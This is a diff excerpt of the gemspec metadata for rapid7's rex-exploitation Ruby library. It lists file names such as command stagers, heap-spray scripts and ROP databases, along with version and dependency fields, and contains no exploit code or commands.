+
extra_rdoc_files: []
|
210
|
+
files:
|
211
|
+
- ".gitignore"
|
212
|
+
- ".rspec"
|
213
|
+
- ".travis.yml"
|
214
|
+
- CODE_OF_CONDUCT.md
|
215
|
+
- Gemfile
|
216
|
+
- README.md
|
217
|
+
- Rakefile
|
218
|
+
- bin/console
|
219
|
+
- bin/setup
|
220
|
+
- data/exploits/cmdstager/debug_asm
|
221
|
+
- data/exploits/cmdstager/debug_write
|
222
|
+
- data/exploits/cmdstager/vbs_b64
|
223
|
+
- data/exploits/cmdstager/vbs_b64_adodb
|
224
|
+
- data/exploits/cmdstager/vbs_b64_noquot
|
225
|
+
- data/exploits/cmdstager/vbs_b64_sleep
|
226
|
+
- data/js/detect/ie_addons.js
|
227
|
+
- data/js/detect/misc_addons.js
|
228
|
+
- data/js/detect/os.js
|
229
|
+
- data/js/memory/explib2/lib/explib2.js
|
230
|
+
- data/js/memory/explib2/payload/drop_exec.js
|
231
|
+
- data/js/memory/explib2/payload/exec.js
|
232
|
+
- data/js/memory/heap_spray.js
|
233
|
+
- data/js/memory/heaplib2.js
|
234
|
+
- data/js/memory/mstime_malloc.js
|
235
|
+
- data/js/memory/property_spray.js
|
236
|
+
- data/js/network/ajax_download.js
|
237
|
+
- data/js/network/ajax_post.js
|
238
|
+
- data/js/network/xhr_shim.js
|
239
|
+
- data/js/utils/base64.js
|
240
|
+
- data/ropdb/flash.xml
|
241
|
+
- data/ropdb/hxds.xml
|
242
|
+
- data/ropdb/java.xml
|
243
|
+
- data/ropdb/msvcrt.xml
|
244
|
+
- data/ropdb/reader.xml
|
245
|
+
- data/ropdb/samba.xml
|
246
|
+
- data/ropdb/stagefright.xml
|
247
|
+
- lib/rex/exploitation.rb
|
248
|
+
- lib/rex/exploitation/cmdstager.rb
|
249
|
+
- lib/rex/exploitation/cmdstager/base.rb
|
250
|
+
- lib/rex/exploitation/cmdstager/bourne.rb
|
251
|
+
- lib/rex/exploitation/cmdstager/certutil.rb
|
252
|
+
- lib/rex/exploitation/cmdstager/debug_asm.rb
|
253
|
+
- lib/rex/exploitation/cmdstager/debug_write.rb
|
254
|
+
- lib/rex/exploitation/cmdstager/echo.rb
|
255
|
+
- lib/rex/exploitation/cmdstager/printf.rb
|
256
|
+
- lib/rex/exploitation/cmdstager/tftp.rb
|
257
|
+
- lib/rex/exploitation/cmdstager/vbs.rb
|
258
|
+
- lib/rex/exploitation/egghunter.rb
|
259
|
+
- lib/rex/exploitation/encryptjs.rb
|
260
|
+
- lib/rex/exploitation/heaplib.js.b64
|
261
|
+
- lib/rex/exploitation/heaplib.rb
|
262
|
+
- lib/rex/exploitation/js.rb
|
263
|
+
- lib/rex/exploitation/js/detect.rb
|
264
|
+
- lib/rex/exploitation/js/memory.rb
|
265
|
+
- lib/rex/exploitation/js/network.rb
|
266
|
+
- lib/rex/exploitation/js/utils.rb
|
267
|
+
- lib/rex/exploitation/jsobfu.rb
|
268
|
+
- lib/rex/exploitation/obfuscatejs.rb
|
269
|
+
- lib/rex/exploitation/omelet.rb
|
270
|
+
- lib/rex/exploitation/opcodedb.rb
|
271
|
+
- lib/rex/exploitation/ropdb.rb
|
272
|
+
- lib/rex/exploitation/seh.rb
|
273
|
+
- lib/rex/exploitation/version.rb
|
274
|
+
- rex-exploitation.gemspec
|
275
|
+
homepage: https://github.com/rapid7/rex-exploitation
|
276
|
+
licenses: []
|
277
|
+
metadata: {}
|
278
|
+
post_install_message:
|
279
|
+
rdoc_options: []
|
280
|
+
require_paths:
|
281
|
+
- lib
|
282
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
283
|
+
requirements:
|
284
|
+
- - ">="
|
285
|
+
- !ruby/object:Gem::Version
|
286
|
+
version: '0'
|
287
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
288
|
+
requirements:
|
289
|
+
- - ">="
|
290
|
+
- !ruby/object:Gem::Version
|
291
|
+
version: '0'
|
292
|
+
requirements: []
|
293
|
+
rubyforge_project:
|
294
|
+
rubygems_version: 2.4.8
|
295
|
+
signing_key:
|
296
|
+
specification_version: 4
|
297
|
+
summary: Ruby Exploitation(Rex) library for various exploitation helpers
|
298
|
+
test_files: []
|